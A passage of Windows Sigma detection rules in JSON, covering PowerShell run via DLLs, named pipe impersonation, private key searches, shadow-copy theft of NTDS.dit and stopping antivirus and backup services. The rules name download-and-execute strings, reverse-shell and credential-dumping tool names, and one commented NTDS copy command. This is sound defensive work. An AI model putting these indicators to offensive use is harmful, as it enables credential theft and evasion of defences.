    "content": "title: Potential PowerShell Execution Via DLL\nid: 6812a10b-60ea-420c-832f-dfcc33b646ba\nstatus: test\ndescription: |\n    Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.\n    This detection assumes that PowerShell commands are passed via the CommandLine.\nreferences:\n    - https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-08-25\nmodified: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\InstallUtil.exe'\n              - '\\RegAsm.exe'\n              - '\\RegSvcs.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n        - OriginalFileName:\n              - 'InstallUtil.exe'\n              - 'RegAsm.exe'\n              - 'RegSvcs.exe'\n              - 'REGSVR32.EXE'\n              - 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'Default.GetString'\n            - 'DownloadString'\n            - 'FromBase64String'\n            - 'ICM '\n            - 'IEX '\n            - 'Invoke-Command'\n            - 'Invoke-Expression'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml",
    "content": "title: Privilege Escalation via Named Pipe Impersonation\nid: 9bd04a79-dabe-4f1f-a5ff-92430265c96b\nrelated:\n    - id: f35c5d71-b489-4e22-a115-f003df287317\n      type: derived\nstatus: test\ndescription: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\nmodified: 2022-12-30\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n    selection_args:\n        CommandLine|contains|all:\n            - 'echo'\n            - '>'\n            - '\\\\\\\\.\\\\pipe\\\\'\n    condition: all of selection*\nfalsepositives:\n    - Other programs that cause these patterns (please report)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml",
    "content": "title: Private Keys Reconnaissance Via CommandLine Tools\nid: 213d6a77-3d55-4ce8-ba74-fcfef741974e\nstatus: test\ndescription: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-20\nmodified: 2023-03-06\ntags:\n    - attack.credential-access\n    - attack.t1552.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cmd_cli:\n        CommandLine|contains: 'dir '\n    selection_pwsh_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_pwsh_cli:\n        CommandLine|contains: 'Get-ChildItem '\n    selection_findstr:\n        - Image|endswith: '\\findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_ext:\n        CommandLine|contains:\n            - '.key'\n            - '.pgp'\n            - '.gpg'\n            - '.ppk'\n            - '.p12'\n            - '.pem'\n            - '.pfx'\n            - '.cer'\n            - '.p7b'\n            - '.asc'\n    condition: selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or selection_findstr)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml",
    "content": "title: Suspicious RunAs-Like Flag Combination\nid: 50d66fb0-03f8-4da0-8add-84e77d12a020\nstatus: test\ndescription: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-11\ntags:\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_user:\n        CommandLine|contains:\n            - ' -u system '\n            - ' --user system '\n            - ' -u NT'\n            - ' -u \"NT'\n            - \" -u 'NT\"\n            - ' --system '\n            - ' -u administrator '\n    selection_command:\n        CommandLine|contains:\n            - ' -c cmd'\n            - ' -c \"cmd'\n            - ' -c powershell'\n            - ' -c \"powershell'\n            - ' --command cmd'\n            - ' --command powershell'\n            - ' -c whoami'\n            - ' -c wscript'\n            - ' -c cscript'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml",
    "content": "title: Windows Processes Suspicious Parent Directory\nid: 96036718-71cc-4027-a538-d1587e0006a7\nstatus: test\ndescription: Detect suspicious parent processes of well-known Windows processes\nreferences:\n    - https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\n    - https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/\n    - https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf\nauthor: vburov\ndate: 2019-02-23\nmodified: 2025-03-06\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\svchost.exe'\n            - '\\taskhost.exe'\n            - '\\lsm.exe'\n            - '\\lsass.exe'\n            - '\\services.exe'\n            - '\\lsaiso.exe'\n            - '\\csrss.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n    filter_sys:\n        - ParentImage|endswith:\n              - '\\SavService.exe'\n              - '\\ngen.exe'\n        - ParentImage|contains:\n              - '\\System32\\'\n              - '\\SysWOW64\\'\n    filter_msmpeng:\n        ParentImage|contains:\n            - '\\Windows Defender\\'\n            - '\\Microsoft Security Client\\'\n        ParentImage|endswith: '\\MsMpEng.exe'\n    filter_null:\n        - ParentImage: null\n        - ParentImage:\n              - ''\n              - '-'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Some security products seem to spawn these\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_progname.yml",
    "content": "title: Suspicious Program Names\nid: efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6\nstatus: test\ndescription: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-11\nmodified: 2023-03-22\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|contains:\n              - '\\CVE-202' # Update this when we reach the year 2100\n              - '\\CVE202' # Update this when we reach the year 2100\n        - Image|endswith:\n              - '\\poc.exe'\n              - '\\artifact.exe'\n              - '\\artifact64.exe'\n              - '\\artifact_protected.exe'\n              - '\\artifact32.exe'\n              - '\\artifact32big.exe'\n              - 'obfuscated.exe'\n              - 'obfusc.exe'\n              - '\\meterpreter'\n    selection_commandline:\n        CommandLine|contains:\n            - 'inject.ps1'\n            - 'Invoke-CVE'\n            - 'pupy.ps1'\n            - 'payload.ps1'\n            - 'beacon.ps1'\n            - 'PowerView.ps1'\n            - 'bypass.ps1'\n            - 'obfuscated.ps1'\n            - 'obfusc.ps1'\n            - 'obfus.ps1'\n            - 'obfs.ps1'\n            - 'evil.ps1'\n            - 'MiniDogz.ps1'\n            - '_enc.ps1'\n            - '\\shell.ps1'\n            - '\\rshell.ps1'\n            - 'revshell.ps1'\n            - '\\av.ps1'\n            - '\\av_test.ps1'\n            - 'adrecon.ps1'\n            - 'mimikatz.ps1'\n            - '\\PowerUp_'\n            - 'powerup.ps1'\n            - '\\Temp\\a.ps1'\n            - '\\Temp\\p.ps1'\n            - '\\Temp\\1.ps1'\n            - 'Hound.ps1'\n            - 'encode.ps1'\n            - 'powercat.ps1'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate tools that accidentally match on the searched patterns\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_recon.yml",
    "content": "title: Recon Information for Export with Command Prompt\nid: aa2efee7-34dd-446e-8a37-40790a66efd7\nrelated:\n    - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\n      type: similar\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nauthor: frack113\ndate: 2021-07-30\nmodified: 2022-09-13\ntags:\n    - attack.collection\n    - attack.t1119\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_image:\n        - Image|endswith:\n              - '\\tree.com'\n              - '\\WMIC.exe'\n              - '\\doskey.exe'\n              - '\\sc.exe'\n        - OriginalFileName:\n              - 'wmic.exe'\n              - 'DOSKEY.EXE'\n              - 'sc.exe'\n    selection_redirect:\n        ParentCommandLine|contains:\n            - ' > %TEMP%\\'\n            - ' > %TMP%\\'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml",
    "content": "title: Suspicious Process Execution From Fake Recycle.Bin Folder\nid: 5ce0f04e-3efc-42af-839d-5b3a543b76c0\nrelated:\n    - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca\n      type: derived\nstatus: test\ndescription: Detects process execution from a fake recycle bin folder, often used to avoid security solution.\nreferences:\n    - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets\n    - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-12\nmodified: 2023-12-11\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            # e.g. C:\\$RECYCLER.BIN\n            - 'RECYCLERS.BIN\\'\n            - 'RECYCLER.BIN\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml",
    "content": "title: Suspicious Redirection to Local Admin Share\nid: ab9e3b40-0c85-4ba1-aede-455d226fd124\nstatus: test\ndescription: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers\nreferences:\n    - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-16\nmodified: 2023-12-28\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_redirect:\n        CommandLine|contains: '>'\n    selection_share:\n        CommandLine|contains:\n            - '\\\\\\\\127.0.0.1\\\\admin$\\\\'\n            - '\\\\\\\\localhost\\\\admin$\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_registry_modification_of_ms_setting_protocol_handler.yml",
    "content": "title: Registry Modification of MS-settings Protocol Handler\nid: dd3ee8cc-f751-41c9-ba53-5a32ed47e563\nrelated:\n    - id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7\n      type: similar\nstatus: test\ndescription: |\n    Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence.\n    Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\n    - https://www.trendmicro.com/en_us/research/25/f/water-curse.html\nauthor: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2021-12-20\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1548.002\n    - attack.t1546.001\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_pwsh_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell.exe'\n              - 'pwsh.dll'\n    selection_reg_cli:\n        CommandLine|contains: 'add'\n    selection_pwsh_cli:\n        CommandLine|contains:\n            - 'New-ItemProperty'\n            - 'Set-ItemProperty'\n            - 'ni '\n            - 'sp '\n    selection_cli_key:\n        CommandLine|contains: '\\ms-settings\\shell\\open\\command'\n    condition: (all of selection_reg_* or all of selection_pwsh_*) and selection_cli_key\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml",
    "content": "title: Potential Remote Desktop Tunneling\nid: 8a3038e8-9c9d-46f8-b184-66234a160f6f\nstatus: test\ndescription: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ':3389' # RDP port and usual SSH tunneling related switches in command line\n    selection_opt:\n        CommandLine|contains:\n            - ' -L '\n            - ' -P '\n            - ' -R '\n            - ' -pw '\n            - ' -ssh '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml",
    "content": "title: Potential Defense Evasion Via Right-to-Left Override\nid: ad691d92-15f2-4181-9aa4-723c74f9ddc3\nrelated:\n    - id: e0552b19-5a83-4222-b141-b36184bb8d79\n      type: derived\n    - id: 584bca0f-3608-4402-80fd-4075ff6072e3\n      type: derived\nstatus: test\ndescription: |\n    Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\n    This is used as an obfuscation and masquerading techniques.\nreferences:\n    - https://redcanary.com/blog/right-to-left-override/\n    - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method\n    - https://unicode-explorer.com/c/202E\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-02-06\ntags:\n    - attack.defense-evasion\n    - attack.t1036.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '\\u202e'  # Unicode RTLO character\n            - '[U+202E]'\n    condition: selection\nfalsepositives:\n    - Commandlines that contains scriptures such as arabic or hebrew might make use of this character\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml",
    "content": "title: Script Interpreter Execution From Suspicious Folder\nid: 1228c958-e64e-4e71-92ad-7d429f4138ba\nstatus: test\ndescription: Detects a suspicious script execution in temporary folders or folders accessible by environment variables\nreferences:\n    - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\n    - https://learn.microsoft.com/en-us/windows/win32/shell/csidl\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-08\nmodified: 2023-06-16\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_proc_image:\n        Image|endswith:\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\wscript.exe'\n    selection_proc_flags:\n        CommandLine|contains:\n            - ' -ep bypass '\n            - ' -ExecutionPolicy bypass '\n            - ' -w hidden '\n            - '/e:javascript '\n            - '/e:Jscript '\n            - '/e:vbscript '\n    selection_proc_original:\n        OriginalFileName:\n            - 'cscript.exe'\n            - 'mshta.exe'\n            - 'wscript.exe'\n    selection_folders_1:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\Temp'\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp'\n    selection_folders_2:\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    condition: 1 of selection_proc_* and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml",
    "content": "title: Suspicious Script Execution From Temp Folder\nid: a6a39bdb-935c-4f0a-ab77-35f4bbf44d33\nstatus: test\ndescription: Detects a suspicious script executions from temporary folder\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nauthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton\ndate: 2021-07-14\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\mshta.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        CommandLine|contains:\n            - '\\Windows\\Temp'\n            - '\\Temporary Internet'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\Temp'\n            - '%TEMP%'\n            - '%TMP%'\n            - '%LocalAppData%\\Temp'\n    filter:\n        CommandLine|contains:\n            - ' >'\n            - 'Out-File'\n            - 'ConvertTo-Json'\n            - '-WindowStyle hidden -Verb runAs'  # VSCode behaviour if file cannot be written as current user\n            - '\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\' # EC2 AWS\n    condition: selection and not filter\nfalsepositives:\n    - Administrative scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml",
    "content": "title: Sensitive File Access Via Volume Shadow Copy Backup\nid: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d\nstatus: test\ndescription: |\n    Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\n    - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2024-01-18\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        # copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\temp\\ntds.dit 2>&1\n        # There is an additional \"\\\" to escape the special \"?\"\n        CommandLine|contains: '\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy'\n    selection_2:\n        CommandLine|contains:\n            - '\\\\NTDS.dit'\n            - '\\\\SYSTEM'\n            - '\\\\SECURITY'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_service_creation.yml",
    "content": "title: Suspicious New Service Creation\nid: 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8\nrelated:\n    - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab\n      type: derived\nstatus: test\ndescription: Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-14\nmodified: 2022-11-18\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'create'\n            - 'binPath='\n    selection_posh:\n        CommandLine|contains|all:\n            - 'New-Service'\n            - '-BinaryPathName'\n    susp_binpath:\n        CommandLine|contains:\n            # Add more suspicious commands or binaries\n            - 'powershell'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'svchost'\n            - 'dllhost'\n            - 'cmd '\n            - 'cmd.exe /c'\n            - 'cmd.exe /k'\n            - 'cmd.exe /r'\n            - 'rundll32'\n            # Add more suspicious paths\n            - 'C:\\Users\\Public'\n            - '\\Downloads\\'\n            - '\\Desktop\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - 'C:\\Windows\\TEMP\\'\n            - '\\AppData\\Local\\Temp'\n    condition: 1 of selection* and susp_binpath\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_service_dir.yml",
    "content": "title: Suspicious Service Binary Directory\nid: 883faa95-175a-4e22-8181-e5761aeb373c\nstatus: test\ndescription: Detects a service binary running in a suspicious directory\nreferences:\n    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-09\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\Users\\Public\\'\n            - '\\$Recycle.bin'\n            - '\\Users\\All Users\\'\n            - '\\Users\\Default\\'\n            - '\\Users\\Contacts\\'\n            - '\\Users\\Searches\\'\n            - 'C:\\Perflogs\\'\n            - '\\config\\systemprofile\\'\n            - '\\Windows\\Fonts\\'\n            - '\\Windows\\IME\\'\n            - '\\Windows\\addins\\'\n        ParentImage|endswith:\n            - '\\services.exe'\n            - '\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml",
    "content": "title: Suspicious Windows Service Tampering\nid: ce72ef99-22f1-43d4-8695-419dcb5d9330\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\n    - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b\n      type: obsolete\n    - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts\nreferences:\n    - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg\n    - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\n    - https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/delete-method-in-class-win32-service\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems)\ndate: 2022-09-01\nmodified: 2025-08-27\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1489\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools_img:\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'psservice.exe'\n              - 'pwsh.dll'\n              - 'sc.exe'\n              - 'wmic.exe'\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n              - '\\PowerShell_ISE.EXE'\n              - '\\powershell.exe'\n              - '\\PsService.exe'\n              - '\\PsService64.exe'\n              - '\\pwsh.exe'\n              - '\\sc.exe'\n              - '\\wmic.exe' # wmic process call win32_service where name='servicename' delete\n    selection_tools_cli:\n        - CommandLine|contains:\n              - ' delete '\n              - '.delete()' # Get-WmiObject win32_service -Filter \"name='$serviceName'\" ).delete()\n              - ' pause ' # Covers flags from: PsService and Sc.EXE\n              - ' stop ' # Covers flags from: PsService.EXE, Net.EXE and Sc.EXE\n              - 'Stop-Service '\n              - 'Remove-Service '\n        - CommandLine|contains|all:\n              - 'config'\n              - 'start=disabled'\n    selection_services:\n        CommandLine|contains:\n            - '143Svc'\n            - 'Acronis VSS Provider'\n            - 'AcronisAgent'\n            - 'AcrSch2Svc'\n            - 'AdobeARMservice'\n            - 'AHS Service'\n            - 'Antivirus'\n            - 'Apache4'\n            - 'ARSM'\n            - 'aswBcc'\n            - 'AteraAgent'\n            - 'Avast Business Console Client Antivirus Service'\n            - 'avast! Antivirus'\n            - 'AVG Antivirus'\n            - 'avgAdminClient'\n            - 'AvgAdminServer'\n            - 'AVP1'\n            - 'BackupExec'\n            - 'bedbg'\n            - 'BITS'\n            - 'BrokerInfrastructure'\n            - 'CASLicenceServer'\n            - 'CASWebServer'\n            - 'Client Agent 7.60'\n            - 'Core Browsing Protection'\n            - 'Core Mail Protection'\n            - 'Core Scanning Server'\n            - 'DCAgent'\n            - 'dwmrcs'\n            - 'EhttpSr'\n            - 'ekrn'\n            - 'Enterprise Client Service'\n            - 'epag'\n            - 'EPIntegrationService'\n            - 'EPProtectedService'\n            - 'EPRedline'\n            - 'EPSecurityService'\n            - 'EPUpdateService'\n            - 'EraserSvc11710'\n            - 'EsgShKernel'\n            - 'ESHASRV'\n            - 'FA_Scheduler'\n            - 'FirebirdGuardianDefaultInstance'\n            - 'FirebirdServerDefaultInstance'\n            - 'FontCache3.0.0.0'\n            - 'HealthTLService'\n            - 'hmpalertsvc'\n            - 'HMS'\n            - 'HostControllerService'\n            - 'hvdsvc'\n            - 'IAStorDataMgrSvc'\n            - 'IBMHPS'\n            - 'ibmspsvc'\n            - 'IISAdmin'\n            - 'IMANSVC'\n            - 'IMAP4Svc'\n            - 'instance2'\n            - 'KAVFS'\n            - 'KAVFSGT'\n            - 'kavfsslp'\n            - 'KeyIso'\n            - 'klbackupdisk'\n            - 'klbackupflt'\n            - 'klflt'\n            - 'klhk'\n            - 'KLIF'\n            - 'klim6'\n            - 'klkbdflt'\n            - 'klmouflt'\n            - 'klnagent'\n            - 'klpd'\n            - 'kltap'\n            - 'KSDE1.0.0'\n            - 'LogProcessorService'\n            - 'M8EndpointAgent'\n            - 'macmnsvc'\n            - 'masvc'\n            - 'MBAMService'\n            - 'MBCloudEA'\n            - 'MBEndpointAgent'\n            - 'McAfeeDLPAgentService'\n            - 'McAfeeEngineService'\n            - 'MCAFEEEVENTPARSERSRV'\n            - 'McAfeeFramework'\n            - 'MCAFEETOMCATSRV530'\n            - 'McShield'\n            - 'McTaskManager'\n            - 'mfefire'\n            - 'mfemms'\n            - 'mfevto'\n            - 'mfevtp'\n            - 'mfewc'\n            - 'MMS'\n            - 'mozyprobackup'\n            - 'mpssvc'\n            - 'MSComplianceAudit'\n            - 'MSDTC'\n            - 'MsDtsServer'\n            - 'MSExchange'\n            - 'msftesq1SPROO'\n            - 'msftesql$PROD'\n            - 'msftesql$SQLEXPRESS'\n            - 'MSOLAP$SQL_2008'\n            - 'MSOLAP$SYSTEM_BGC'\n            - 'MSOLAP$TPS'\n            - 'MSOLAP$TPSAMA'\n            - 'MSOLAPSTPS'\n            - 'MSOLAPSTPSAMA'\n            - 'mssecflt'\n            - 'MSSQ!I.SPROFXENGAGEMEHT'\n            - 'MSSQ0SHAREPOINT'\n            - 'MSSQ0SOPHOS'\n            - 'MSSQL'\n            - 'MSSQLFDLauncher$'\n            - 'MySQL'\n            - 'NanoServiceMain'\n            - 'NetMsmqActivator'\n            - 'NetPipeActivator'\n            - 'netprofm'\n            - 'NetTcpActivator'\n            - 'NetTcpPortSharing'\n            - 